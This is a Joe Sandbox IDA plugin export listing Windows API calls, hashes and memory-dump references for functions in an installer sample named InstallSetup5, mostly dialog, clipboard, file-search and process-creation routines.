Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00426903,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00426903,762323A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,00437800,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?,00437800,?), ref: 00405B63
Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?,00437800,?), ref: 00405B70

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0

Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29

Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 08e24528c5172c1f0df5ca4e9d907125f3b856060fead45283370b433cbda764
Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
Opcode Fuzzy Hash: 08e24528c5172c1f0df5ca4e9d907125f3b856060fead45283370b433cbda764
Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405779
GetDlgItem.USER32(?,000003EE), ref: 00405788
GetClientRect.USER32(?,?), ref: 004057C5
GetSystemMetrics.USER32(00000002), ref: 004057CC
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
ShowWindow.USER32(?,00000008), ref: 00405868
GetDlgItem.USER32(?,000003EC), ref: 00405889
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
GetDlgItem.USER32(?,000003F8), ref: 00405797

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

GetDlgItem.USER32(?,000003EC), ref: 004058DB
CreateThread.KERNEL32(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
CloseHandle.KERNEL32(00000000), ref: 004058F0
ShowWindow.USER32(00000000), ref: 00405914
ShowWindow.USER32(?,00000008), ref: 00405919
ShowWindow.USER32(00000008), ref: 00405963
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
CreatePopupMenu.USER32 ref: 004059A8
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004059BC
GetWindowRect.USER32(?,?), ref: 004059DC
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
OpenClipboard.USER32(00000000), ref: 00405A3D
EmptyClipboard.USER32 ref: 00405A43
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
GlobalLock.KERNEL32(00000000), ref: 00405A59
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
CloseClipboard.USER32 ref: 00405A9E

Strings

{, xrefs: 00405981

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004049C7 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404A16
SetWindowTextW.USER32(00000000,?), ref: 00404A40
SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
CoTaskMemFree.OLE32(00000000), ref: 00404AFC
lstrcmpiW.KERNEL32(004326A0,0042CA68,00000000,?,?), ref: 00404B2E
lstrcatW.KERNEL32(?,004326A0), ref: 00404B3A
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C

Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE

Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
Part of subcall function 00406805: CharNextW.USER32(?,0043F000,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
Part of subcall function 00406805: CharPrevW.USER32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A

Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

A, xrefs: 00404AEA

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 00405C63 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,76233420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405C8C
lstrcatW.KERNEL32(0042EA70,\*.*), ref: 00405CD4
lstrcatW.KERNEL32(?,0040A014), ref: 00405CF7
lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405CFD
FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,76233420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405D0D
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
FindClose.KERNEL32(00000000), ref: 00405DBC

Strings

\*.*, xrefs: 00405CCE
pB, xrefs: 00405CBC
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C70

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$\*.*$pB
API String ID: 2035342205-941012923
Opcode ID: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
Opcode Fuzzy Hash: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 0040226E

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 542301482-1104044542
Opcode ID: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
Opcode Fuzzy Hash: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004068B4 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,0042FAB8,0042F270,00405F77,0042F270,0042F270,00000000,0042F270,0042F270, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
FindClose.KERNEL32(00000000), ref: 004068CB

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9

Uniqueness

Uniqueness Score: -1.00%

Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
Opcode Fuzzy Hash: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00406DC6 Relevance: .3, Instructions: 334COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05

Uniqueness

Uniqueness Score: -1.00%

Function 0040759D Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F5B
GetDlgItem.USER32(?,00000408), ref: 00404F66
GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
DeleteObject.GDI32(00000000), ref: 0040503D
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
GetWindowLongW.USER32(?,000000F0), ref: 00405181
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
ShowWindow.USER32(?,00000005), ref: 0040519F
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
ImageList_Destroy.COMCTL32(?), ref: 0040536D
GlobalFree.KERNEL32(?), ref: 0040537D
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
ShowWindow.USER32(?,00000000), ref: 00405527
GetDlgItem.USER32(?,000003FE), ref: 00405532
ShowWindow.USER32(00000000), ref: 00405539

Strings

M, xrefs: 004050F7
N, xrefs: 004051D8
, xrefs: 00405511

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58

Uniqueness

Uniqueness Score: -1.00%

